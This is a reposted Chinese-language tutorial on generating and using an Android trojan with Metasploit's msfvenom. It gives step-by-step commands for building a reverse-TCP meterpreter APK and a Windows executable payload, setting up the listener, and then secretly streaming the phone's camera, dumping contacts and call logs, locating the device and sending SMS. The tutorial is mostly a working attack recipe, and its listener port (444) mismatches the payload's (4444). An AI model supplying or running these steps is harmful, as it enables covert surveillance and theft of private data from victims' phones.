msf之手機木馬生成&利用


msf自帶的有對應各個平台生成木馬的工具msfvenom,而且不需要進入msf,直接在命令行輸入命令即可

木馬生成命令

msfvenom -p payload LHOST=本地地址 LPORT=本地端口 -f 文件類型 -o 木馬文件
如:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.60.44 LPORT=4444 -f exe -o payload.exe

本次以一個安卓手機木馬為例,簡單介紹msf的木馬生成功能

環境准備

肉雞 : 一加3T手機 安卓8.0 已獲取root

攻擊機 : kali

木馬生成

msfvenom --platform android -p android/meterpreter_reverse_tcp LHOST=192.168.1.16 LPORT=4444 R> /root/demo.apk

image-20201226214558606

設置監聽

use exploit/multi/handler
set lhost 192.168.1.16
set lport 444

image-20201226224516835

上傳木馬到手機 並打開

image-20201226223826315

使用監聽

run

image-20201226221902725

查看命令

help

image-20201226221949299

打開手機前置攝像頭

webcam_stream -i 2

image-20201226224651540

前提是手機亮屏 , 第一次手機會有攝像頭打開的提示 , 默認鎖屏一會消失畫面

image-20201226222223345

獲取手機聯系人

dump_contacts    #獲取聯系人列表
image-20201226223947495

針對手機的其他命令:

image-20201226224342933

Geolocate #定位
wlan_geolocate #wifi 定位
dump_calllog #獲取通話記錄
send_sms #發送短信

# 發送短信: 
meterpreter > send_sms -d 152xxxx1475 -t hello word
[+] SMS sent - Transmission successful


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM